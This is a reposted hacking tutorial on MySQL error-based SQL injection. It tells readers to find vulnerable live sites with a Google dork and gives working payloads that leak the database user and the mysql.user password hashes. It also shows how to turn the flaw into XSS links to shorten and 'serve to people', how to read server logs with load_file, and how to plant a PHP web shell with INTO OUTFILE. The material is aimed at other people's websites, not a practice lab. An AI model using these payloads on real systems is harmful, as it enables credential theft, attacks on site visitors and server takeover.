Mysql Error Based injection

출처 :http://blog.hacktalk.net/mysql-error-based-injection/

————————————————-
Mysql Error Based injection
————————————————-
Author : Keith (k3170) Makan

Requirements:
>A Brain
>A browser
>Basic SQL (poke around the internet for an SQL manual, it should’nt take long to learn)

First off, lets make sure you guys know what Error Based SQL injection is and where you can find some good examples to train
with.
We need to find Web applications that:

*are backed by MySQL (the version doesn’t really matter right now)
*display full error dumps (detailing the syntax that causes the error)
*and obviously have an injection flaw (preferably on integer input data)

We can find these by Google Dorking for them (its like fishing on the internet! lols). Whip out your Google search bar and enter:

`
intext:”You have an error in your SQL” inurl:=1
`
you can use any number you wish, i can garuantee good results for 1 thought lols its the only number I’ve tested, the ‘=1′
is obviously to make sure that we get a link to a script that accepts integer data!

This is the string that will be printed on a page that has encountered a MySQL error, the rest of the message is quite specific
so I suggest just searching for this, you should get just what we are looking for, as an example you’re looking for something
like this:
[error_dump.pic]
If your page shows you something similar you’re on the right track!
Side Note:
+—————————————————————-+
| ! |
| You may need to by pass mysql_escape* functions and the like |
| to get the database to listen to you, this why I’ve opted for |
| an injection on integer data, since largely people don’t |
| know how to escape them properly, and when they do its still |
| pretty easy to get around |
| |
+—————————————————————-+
Now, what we have is a vulnerability, we need to turn it into an exploit, this is done by injecting a very specific query that allows as not only to generate an error, but to influence the contents of the error message (Oh thats why they call it that!!).

Without further a do, lets take a look at an injectable sql query:

<?php
mysql_query(“select password from login where ID=’$_GET[id]‘”);
?>
the URL may look like:
URL:www.[someting].com/login.php?id=[SQL]

So clearly the injection flaw here is the ‘id’ parameter, you may be able to use a classic SQL injection by injecting a
” Union select” and filling in another query of you choosing but this often doesn’t work nowadays, web applications
only display cetain information from queries, to get around this we use error based sql injection:

should you not know how many columns the query is using, for instance if the query script looks like this
<?php
mysql_query(“select * from login where ID=’$_GET[id]‘”);
?>
you may try enumerating the coloumns (which will just rack up alot of noise in the access.log, and waste time) or you could
inject this lil baby:
(assuming we want to know the user() of the database)

URL:www.[something].com/login.php?id=-99 or row(1,1) > (select count(*),concat(user(),0x3a,floor(rand()
*2))x from (select 1 union 2)a group by x limit 0,1)

you should see something like this on the page:

ERROR 1062 (23000): Duplicate entry ‘kmakan@localhost1′ for key ‘group_key’

You can see that the error message actually prints out the result of the ‘user()’ function call, this is because of the way
the query was structured, when the results are grouped and MySQL has to choose between duplicates of the grouping key,
since nothing in particular seperates these keys in the grouping, an error is generated because the grouping is illogical
in this way.

What this means is that you can put any select statement you want in the concat() call of the query (so be creative!!).
Should you want the same privileges and freedom as the web application its self on the web server you may try leaking
the password hashes like this:

URL: www.[something].com/login.php?id=-99 or row(1,1) > (select count(*),concat(injectString,0x3a,floor(
rand()*2))x from (select 1 union 2)a group by x limit 0,1)

where injectString = (select concat(User,0x2c,Password) from mysql.user limit 0,1)

you may ask why we need the “limit 0,1″ in the injectString, well this is because the select will generate a

ERROR 1242 (21000): Subquery returns more than 1 row

This is beacuse we are generating a grouping key with the result of the select we injected, and grouping keys are one dimensional
pieces of data, if it has more than one row it cannot be used as a grouping key

Also when you are constructing a query to inject in the place of injectString, make sure it only generates (or returns one coloumn) this is why i opted for

… select CONCAT(User,0x3c,Password) from …

and not

… select User,0x3a,Password from …

beacuse you cannot use something with more than one column as a grouping key, should you try this MySQL will generate a

ERROR 1241 (21000): Operand should contain 1 column(s)

And thats all folks!! Oh i almost forgot, you would want to collect more than one peice of data from the server so you need
know how to use the limit part of the inject, this how you interate through rows in a table using limit

limit 0,1
limit 1,1
limit 2,1
…
limit n,1 (where n is the number of the row)

What else is this good for??
—————————-

*XSS
An interesting note to add is that if Error Based SQL injection is possible, a quite effective XSS is is possible. To elaborate
heres an example:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select “[YOUR JAVA SCRIPT]“),0x3a,
floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

you can then parse this url through a shortener like t.co or whatever and serve it to people.
The effectiveness of this lies in the speed at which you can accomplish this and the fact that you can silently inject a small
script into a trusted page!

For those of you who are skilled coders, you may even be able to write a lil script that dorks for Error Based vulnerabilities
and turns them into XSSs and then spams them.

*LFI<->RFI
Because MySQL supports the ‘load_file’ and ‘into dumpfile’ or ‘into outfile’ functions either a Local File inclusion, or Remote File inclusion exploit can be performed, as an example:

An LFI:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select load_file(‘/var/log/apache2/access.log’)
into outfile ‘/tmp/logdump’),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)

An RFI:
www.example.com/script.php?id=-99 or row(1,1) > (select count(*),concat((select “<?php system[$_GET[cmd]]?>”
into outfile /tmp/c0nfig.php),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 0,1)